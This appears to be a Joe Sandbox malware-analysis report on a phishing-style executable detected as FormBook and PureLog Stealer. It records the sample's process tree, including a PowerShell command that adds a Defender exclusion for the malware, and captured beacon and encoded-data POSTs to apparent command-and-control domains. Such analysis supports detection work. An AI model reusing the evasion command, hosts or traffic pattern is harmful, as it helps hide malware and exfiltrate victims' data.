                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                          Session ID: 23, Source IP: 192.168.2.4, Source Port: 50030, Destination IP: 213.171.195.105, Destination Port: 80, PID: 4564
                                                                                                                          Process: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp: Jan 15, 2025 18:17:47.511580944 CET, Bytes transferred: 10777, Direction: OUT
                                                                                                                          POST /he9k/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.aloezhealthcare.info
                                                                                                                          Origin: http://www.aloezhealthcare.info
                                                                                                                          Referer: http://www.aloezhealthcare.info/he9k/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Timestamp: Jan 15, 2025 18:17:48.103812933 CET, Bytes transferred: 309, Direction: IN
                                                                                                                          HTTP/1.1 405 Not Allowed
                                                                                                                          server: nginx/1.20.1
                                                                                                                          date: Wed, 15 Jan 2025 17:17:48 GMT
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 157
                                                                                                                          connection: close
                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                          Session ID: 24, Source IP: 192.168.2.4, Source Port: 50031, Destination IP: 213.171.195.105, Destination Port: 80, PID: 4564
                                                                                                                          Process: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp: Jan 15, 2025 18:17:50.053545952 CET, Bytes transferred: 391, Direction: OUT
                                                                                                                          GET /he9k/?V0=0MI6+xzwqxZaqD2fSvbI+Ez0sKo1K30QNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOzrl593t+ZyNHd/O+D84ZuyAEiK4V6BaRopc=&6NWT=ubtLSzl HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.aloezhealthcare.info
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Timestamp: Jan 15, 2025 18:17:50.653280020 CET, Bytes transferred: 1236, Direction: IN
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          server: nginx/1.20.1
                                                                                                                          date: Wed, 15 Jan 2025 17:17:50 GMT
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 2862
                                                                                                                          last-modified: Wed, 27 Nov 2024 10:28:56 GMT
                                                                                                                          etag: "6746f468-b2e"
                                                                                                                          accept-ranges: bytes
                                                                                                                          connection: close
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel="stylesheet" href="/styles/css/index.css"> <link rel="shortcut icon" href="https://static.fasthosts.co.uk/icons/favicon.ico" type="image/x-icon" /> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-199510482-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-199510482-1'); </script> </head><body> <div class="container"> <nav class="logo"> <a href="https://fasthosts.co.uk/" rel="nofollow"> <img src="/assets/fasthosts-logo-secondary.svg" alt="Fasthosts"></img> </a> </nav> <main> <h2>Welcome to <span class="domain
                                                                                                                          Timestamp: Jan 15, 2025 18:17:50.653325081 CET, Bytes transferred: 224, Direction: IN
                                                                                                                          Data Ascii: Var"></span></h2> <p> This domain name is parked for FREE by <strong><a href="https://fasthosts.co.uk/" rel="nofollow">fasthosts.co.uk</a></strong> </p> <div class="row"> <div class
                                                                                                                          Timestamp: Jan 15, 2025 18:17:50.653352976 CET, Bytes transferred: 1236, Direction: IN
                                                                                                                          Data Ascii: ="card card--is-cta"> <h3> Looking to buy a similar domain to <br> <strong><span class="domainVar"></span>?</strong> </h3> <a class="cta cta--primary" rel="nofollow" id="domainSearchCta">St
                                                                                                                          Timestamp: Jan 15, 2025 18:17:50.653384924 CET, Bytes transferred: 224, Direction: IN
                                                                                                                          Data Ascii: tion.hostname || document.location.hostname.replace("www.", "") document.querySelectorAll(".domainVar").forEach(placeholder => placeholder.innerText = cleanHostname) document.getElementById("domainSearchCta").href =
                                                                                                                          Timestamp: Jan 15, 2025 18:17:50.653465986 CET, Bytes transferred: 176, Direction: IN
                                                                                                                          Data Ascii: `https://www.fasthosts.co.uk/domain-names/search/?domain=${cleanHostname}&utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_dac` </script></body></html>


                                                                                                                          Session ID: 25, Source IP: 192.168.2.4, Source Port: 50032, Destination IP: 85.159.66.93, Destination Port: 80, PID: 4564
                                                                                                                          Process: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp: Jan 15, 2025 18:17:55.807677984 CET, Bytes transferred: 669, Direction: OUT
                                                                                                                          POST /coi2/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.letsbookcruise.xyz
                                                                                                                          Origin: http://www.letsbookcruise.xyz
                                                                                                                          Referer: http://www.letsbookcruise.xyz/coi2/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=wcM0ZpOUiZfIqTQ2KnUnQlUiR3AFjQ8/Y2vc3HfhJB1FLGkVKvf36bFQnOy3VdjeNCWNaI2s0PPrZ0RtlzruG5bG8mCRQxYpBmKqN2fqdBGeOOVh9rQsSXdKGrmGFzWpqq8tntigaEeGx+FAYmOZEqvylBQLQSzFKBFDzq7HgbfqnHVATe+kNd/oShoWppJepw==


                                                                                                                          Session ID: 26, Source IP: 192.168.2.4, Source Port: 50033, Destination IP: 85.159.66.93, Destination Port: 80, PID: 4564
                                                                                                                          Process: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp: Jan 15, 2025 18:17:58.362605095 CET, Bytes transferred: 689, Direction: OUT
                                                                                                                          POST /coi2/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.letsbookcruise.xyz
                                                                                                                          Origin: http://www.letsbookcruise.xyz
                                                                                                                          Referer: http://www.letsbookcruise.xyz/coi2/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=wcM0ZpOUiZfIpzA2PAInBVUtPHAFow94Y2zc3GbxJyRFIjYVLuf35bFQouyyINjrNCqvaKis0OvrZxttlgzhFJbY0GCXdRYpBmKqNyPUdBeeO+lhv6Qjb3dJPLmGBzXiqq8fnumKaBaGx8dAWTyWd6vwohQYQgugMxYZxanYve7pmBYaCvfzfdbbPmhikq0Xy5UTolCeaeDgzyIalDfq3wE=


                                                                                                                          Session ID: 27, Source IP: 192.168.2.4, Source Port: 50034, Destination IP: 85.159.66.93, Destination Port: 80, PID: 4564
                                                                                                                          Process: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp: Jan 15, 2025 18:18:01.080929995 CET, Bytes transferred: 10771, Direction: OUT
                                                                                                                          POST /coi2/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.letsbookcruise.xyz
                                                                                                                          Origin: http://www.letsbookcruise.xyz
                                                                                                                          Referer: http://www.letsbookcruise.xyz/coi2/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4


                                                                                                                          Target ID:0
                                                                                                                          Start time:12:14:55
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\PO -2025918.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\PO -2025918.exe"
                                                                                                                          Imagebase:0x390000
                                                                                                                          File size:782'336 bytes
                                                                                                                          MD5 hash:CB01D48BAF8A685F7F8233565E3CBFB7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:3
                                                                                                                          Start time:12:15:12
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
                                                                                                                          Imagebase:0xc80000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:4
                                                                                                                          Start time:12:15:12
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\PO -2025918.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\PO -2025918.exe"
                                                                                                                          Imagebase:0xfa0000
                                                                                                                          File size:782'336 bytes
                                                                                                                          MD5 hash:CB01D48BAF8A685F7F8233565E3CBFB7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:5
                                                                                                                          Start time:12:15:12
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:8
                                                                                                                          Start time:12:15:31
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe"
                                                                                                                          Imagebase:0x800000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:9
                                                                                                                          Start time:12:15:32
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\SysWOW64\ROUTE.EXE"
                                                                                                                          Imagebase:0xcf0000
                                                                                                                          File size:19'456 bytes
                                                                                                                          MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Target ID:10
                                                                                                                          Start time:12:15:45
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe"
                                                                                                                          Imagebase:0x800000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:11
                                                                                                                          Start time:12:15:57
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                          Imagebase:0x7ff6bf500000
                                                                                                                          File size:676'768 bytes
                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true


                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:10.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:5.5%
                                                                                                                            Total number of Nodes:55
                                                                                                                            Total number of Limit Nodes:6

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892748708.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7080000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Hoq$Hoq$Hoq$Hoq$Hoq
                                                                                                                            • API String ID: 0-1079488684
                                                                                                                            • Opcode ID: 6cab8b3f31a80398dc7c8accc220fe9ea6899cfc00a560b2a86834139d9ce996
                                                                                                                            • Instruction ID: e02d36bff755a5713dcb9c9e24db010e38e82a77d30768c6b3b19452fa87beae
                                                                                                                            • Opcode Fuzzy Hash: 6cab8b3f31a80398dc7c8accc220fe9ea6899cfc00a560b2a86834139d9ce996
                                                                                                                            • Instruction Fuzzy Hash: 693261B0B002548FDB94EFA8C8547AEBBF2BF84300F14C6AAD449AB395DB349D45CB55
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7783bb9a83020a2d05b466123b3c71bbc4c049adfa71aa22166ec16d90a04f98
                                                                                                                            • Instruction ID: 54783f24d8616bdab75f9af36d1f497b64a85d9993d34f99df566bf7fe721941
                                                                                                                            • Opcode Fuzzy Hash: 7783bb9a83020a2d05b466123b3c71bbc4c049adfa71aa22166ec16d90a04f98
                                                                                                                            • Instruction Fuzzy Hash: 5ED124B0E04618CFDB54CFA9C8847EEBBF5BF4A300F1492AAD41AA7252DB355985CF05
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892748708.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7080000_PO -2025918.jbxd
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892748708.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7080000_PO -2025918.jbxd
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd

                                                                                                                            Control-flow Graph (legend: Executed / Not Executed): block range 254d551-254d72d, calling GetCurrentProcess, GetCurrentThread, GetCurrentProcess, 254d72f, GetCurrentThreadId
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0254D5DE
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0254D61B
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0254D658
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0254D6B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0

                                                                                                                            Control-flow Graph (legend: Executed / Not Executed): block range 254d560-254d72d, calling GetCurrentProcess, GetCurrentThread, GetCurrentProcess, 254d72f, GetCurrentThreadId
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0254D5DE
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0254D61B
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0254D658
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0254D6B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0

                                                                                                                            Control-flow Graph (legend: Executed / Not Executed): block range 70701f7-70704b1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq$Hoq
                                                                                                                            • API String ID: 0-3084834809
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq
                                                                                                                            • API String ID: 0-3175707579
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0254B51E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'kq
                                                                                                                            • API String ID: 0-3255046985
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02545DA9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02545DA9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0254D82F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            APIs
                                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0708A8A2,?,?,?,?,?), ref: 0708A947
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892748708.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0254B51E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            • Opcode Fuzzy Hash: ae4f4d6f6d91eba5c215f219e4ba3147bf9d49ed6ade66095f81ee68910d0f43
                                                                                                                            • Instruction Fuzzy Hash: 60F1C675D1061A8BCF14DFA8C954AEDF7B5FF48300F1086A9D949B7214EB70AA89CF90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a2b8f994f9588e61a3714872ece99e64310c6437457a7626857fd1a706fa5278
                                                                                                                            • Instruction ID: 5339de08a1c798ec6ad7bc3fe0e60a401c7e5c03def3bc5d5ca008d88b25fdcb
                                                                                                                            • Opcode Fuzzy Hash: a2b8f994f9588e61a3714872ece99e64310c6437457a7626857fd1a706fa5278
                                                                                                                            • Instruction Fuzzy Hash: E6E1D675D1061A8BCF10DFA8C954AEDF7B5FF48300F1086A9D949B7214EB70AA89CF90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5d12879f7477cdd521f517714108b16f6fe33dbd409f9332216f8f38de542d6a
                                                                                                                            • Instruction ID: a94a8d19088dd7c001a1ddf0e2c8885658614eef5d6dbc85e635182c8ae75171
                                                                                                                            • Opcode Fuzzy Hash: 5d12879f7477cdd521f517714108b16f6fe33dbd409f9332216f8f38de542d6a
                                                                                                                            • Instruction Fuzzy Hash: 37A1F5B4D04619CFDB60DFA9C884BEDBBF4BF0A300F209299D41AA7252D7759989CF05
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
